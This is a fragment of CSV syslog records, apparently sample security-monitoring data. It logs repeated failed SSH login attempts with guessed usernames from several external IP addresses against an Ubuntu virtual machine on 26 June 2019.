+892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:32,UbuntuDevEnv,2019-06-26 18:13:31,auth,UbuntuDevEnv,info,Disconnected from invalid user tomberli 157.230.190.1 port 38936 [preauth],60568,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomberli,157.230.190.1,38936,,
+893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:36,UbuntuDevEnv,2019-06-26 18:13:35,auth,UbuntuDevEnv,info,Invalid user socrate from 54.37.66.73 port 54018,60601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,54.37.66.7,54018,,
+894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:36,UbuntuDevEnv,2019-06-26 18:13:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:36,UbuntuDevEnv,2019-06-26 18:13:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,60601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:38,UbuntuDevEnv,2019-06-26 18:13:37,auth,UbuntuDevEnv,info,Failed password for invalid user socrate from 54.37.66.73 port 54018 ssh2,60601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,54.37.66.7,54018,,
+897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:38,UbuntuDevEnv,2019-06-26 18:13:37,auth,UbuntuDevEnv,info,Disconnected from invalid user socrate 54.37.66.73 port 54018 [preauth],60601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,socrate,54.37.66.7,54018,,
+898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:38,UbuntuDevEnv,2019-06-26 18:13:37,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 54018:11: Bye Bye [preauth],60601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,54018,,
+899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:46,UbuntuDevEnv,2019-06-26 18:13:45,auth,UbuntuDevEnv,info,Invalid user 7 from 122.175.55.196 port 15050,60631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,7,122.175.55.1,15050,,
+900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:46,UbuntuDevEnv,2019-06-26 18:13:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=122.175.55.196,60631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,122.175.55.1,,0,
+901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:46,UbuntuDevEnv,2019-06-26 18:13:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:48,UbuntuDevEnv,2019-06-26 18:13:48,auth,UbuntuDevEnv,info,Failed password for invalid user 7 from 122.175.55.196 port 15050 ssh2,60631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,7,122.175.55.1,15050,,
+903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:48,UbuntuDevEnv,2019-06-26 18:13:48,auth,UbuntuDevEnv,info,Received disconnect from 122.175.55.196 port 15050:11: Bye Bye [preauth],60631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,122.175.55.1,15050,,
+904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:13:48,UbuntuDevEnv,2019-06-26 18:13:48,auth,UbuntuDevEnv,info,Disconnected from invalid user 7 122.175.55.196 port 15050 [preauth],60631,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,7,122.175.55.1,15050,,
+905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:14:27,UbuntuDevEnv,2019-06-26 18:14:26,auth,UbuntuDevEnv,info,Invalid user dennis from 107.175.127.237 port 43854,60772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dennis,107.175.127.2,43854,,
+906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:14:27,UbuntuDevEnv,2019-06-26 18:14:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,60772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:14:27,UbuntuDevEnv,2019-06-26 18:14:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:14:28,UbuntuDevEnv,2019-06-26 18:14:28,auth,UbuntuDevEnv,info,Failed password for invalid user dennis from 107.175.127.237 port 43854 ssh2,60772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dennis,107.175.127.2,43854,,
+909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:14:28,UbuntuDevEnv,2019-06-26 18:14:28,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 43854:11: Bye Bye [preauth],60772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,43854,,
+910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:14:28,UbuntuDevEnv,2019-06-26 18:14:28,auth,UbuntuDevEnv,info,Disconnected from invalid user dennis 107.175.127.237 port 43854 [preauth],60772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dennis,107.175.127.2,43854,,
+911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:04,UbuntuDevEnv,2019-06-26 18:15:04,auth,UbuntuDevEnv,info,Invalid user gauthier from 54.37.66.73 port 34388,60945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,54.37.66.7,34388,,
+912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:04,UbuntuDevEnv,2019-06-26 18:15:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:04,UbuntuDevEnv,2019-06-26 18:15:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,60945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:06,UbuntuDevEnv,2019-06-26 18:15:06,auth,UbuntuDevEnv,info,Failed password for invalid user gauthier from 54.37.66.73 port 34388 ssh2,60945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,54.37.66.7,34388,,
+915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:06,UbuntuDevEnv,2019-06-26 18:15:06,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 34388:11: Bye Bye [preauth],60945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,34388,,
+916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:06,UbuntuDevEnv,2019-06-26 18:15:06,auth,UbuntuDevEnv,info,Disconnected from invalid user gauthier 54.37.66.73 port 34388 [preauth],60945,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gauthier,54.37.66.7,34388,,
+917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:10,UbuntuDevEnv,2019-06-26 18:15:10,auth,UbuntuDevEnv,info,Invalid user tq from 157.230.190.1 port 55502,60969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tq,157.230.190.1,55502,,
+918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:10,UbuntuDevEnv,2019-06-26 18:15:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,60969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:10,UbuntuDevEnv,2019-06-26 18:15:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:13,UbuntuDevEnv,2019-06-26 18:15:12,auth,UbuntuDevEnv,info,Failed password for invalid user tq from 157.230.190.1 port 55502 ssh2,60969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tq,157.230.190.1,55502,,
+921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:13,UbuntuDevEnv,2019-06-26 18:15:12,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 55502:11: Bye Bye [preauth],60969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,55502,,
+922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:15:13,UbuntuDevEnv,2019-06-26 18:15:12,auth,UbuntuDevEnv,info,Disconnected from invalid user tq 157.230.190.1 port 55502 [preauth],60969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tq,157.230.190.1,55502,,
+923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:04,UbuntuDevEnv,2019-06-26 18:18:03,auth,UbuntuDevEnv,info,Invalid user rakuya from 54.37.66.73 port 51586,61644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,54.37.66.7,51586,,
+924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:04,UbuntuDevEnv,2019-06-26 18:18:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:04,UbuntuDevEnv,2019-06-26 18:18:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,61644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:06,UbuntuDevEnv,2019-06-26 18:18:05,auth,UbuntuDevEnv,info,Failed password for invalid user rakuya from 54.37.66.73 port 51586 ssh2,61644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,54.37.66.7,51586,,
+927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:06,UbuntuDevEnv,2019-06-26 18:18:05,auth,UbuntuDevEnv,info,Disconnected from invalid user rakuya 54.37.66.73 port 51586 [preauth],61644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,54.37.66.7,51586,,
+928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:06,UbuntuDevEnv,2019-06-26 18:18:05,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 51586:11: Bye Bye [preauth],61644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,51586,,
+929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:37,UbuntuDevEnv,2019-06-26 18:18:37,auth,UbuntuDevEnv,info,Did not receive identification string from 58.87.109.107 port 38020,61770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,38020,,
+930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:50,UbuntuDevEnv,2019-06-26 18:18:49,auth,UbuntuDevEnv,info,Invalid user rebecca from 157.230.190.1 port 60406,61805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rebecca,157.230.190.1,60406,,
+931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:50,UbuntuDevEnv,2019-06-26 18:18:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,61805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:50,UbuntuDevEnv,2019-06-26 18:18:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:52,UbuntuDevEnv,2019-06-26 18:18:52,auth,UbuntuDevEnv,info,Invalid user guest from 107.175.127.237 port 49994,61804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,107.175.127.2,49994,,
+934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:52,UbuntuDevEnv,2019-06-26 18:18:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,61804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:52,UbuntuDevEnv,2019-06-26 18:18:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:52,UbuntuDevEnv,2019-06-26 18:18:52,auth,UbuntuDevEnv,info,Failed password for invalid user rebecca from 157.230.190.1 port 60406 ssh2,61805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rebecca,157.230.190.1,60406,,
+937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:52,UbuntuDevEnv,2019-06-26 18:18:52,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 60406:11: Bye Bye [preauth],61805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,60406,,
+938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:52,UbuntuDevEnv,2019-06-26 18:18:52,auth,UbuntuDevEnv,info,Disconnected from invalid user rebecca 157.230.190.1 port 60406 [preauth],61805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rebecca,157.230.190.1,60406,,
+939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:54,UbuntuDevEnv,2019-06-26 18:18:54,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 107.175.127.237 port 49994 ssh2,61804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,107.175.127.2,49994,,
+940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:55,UbuntuDevEnv,2019-06-26 18:18:54,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 107.175.127.237 port 49994 [preauth],61804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,107.175.127.2,49994,,
+941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:18:55,UbuntuDevEnv,2019-06-26 18:18:54,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 49994:11: Bye Bye [preauth],61804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,49994,,
+942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:30,UbuntuDevEnv,2019-06-26 18:19:29,auth,UbuntuDevEnv,info,Invalid user miner from 54.37.66.73 port 60188,61947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,54.37.66.7,60188,,
+943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:30,UbuntuDevEnv,2019-06-26 18:19:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,61947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:30,UbuntuDevEnv,2019-06-26 18:19:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:31,UbuntuDevEnv,2019-06-26 18:19:31,auth,UbuntuDevEnv,info,Failed password for invalid user miner from 54.37.66.73 port 60188 ssh2,61947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,54.37.66.7,60188,,
+946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:31,UbuntuDevEnv,2019-06-26 18:19:31,auth,UbuntuDevEnv,info,Disconnected from invalid user miner 54.37.66.73 port 60188 [preauth],61947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,54.37.66.7,60188,,
+947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:31,UbuntuDevEnv,2019-06-26 18:19:31,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 60188:11: Bye Bye [preauth],61947,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,60188,,
+948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:43,UbuntuDevEnv,2019-06-26 18:19:42,auth,UbuntuDevEnv,info,Invalid user mama from 165.227.41.202 port 50954,61991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mama,165.227.41.2,50954,,
+949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:43,UbuntuDevEnv,2019-06-26 18:19:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:43,UbuntuDevEnv,2019-06-26 18:19:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.227.41.202,61991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.227.41.2,,0,
+951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 18:19:44,UbuntuDevEnv,2019-06-26 18:19:44,auth,UbuntuDevEnv,info,Failed password for invalid user mama from 165.227.41.202 port 50954 ssh2,61991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mama,165.227.41.2,50954,,
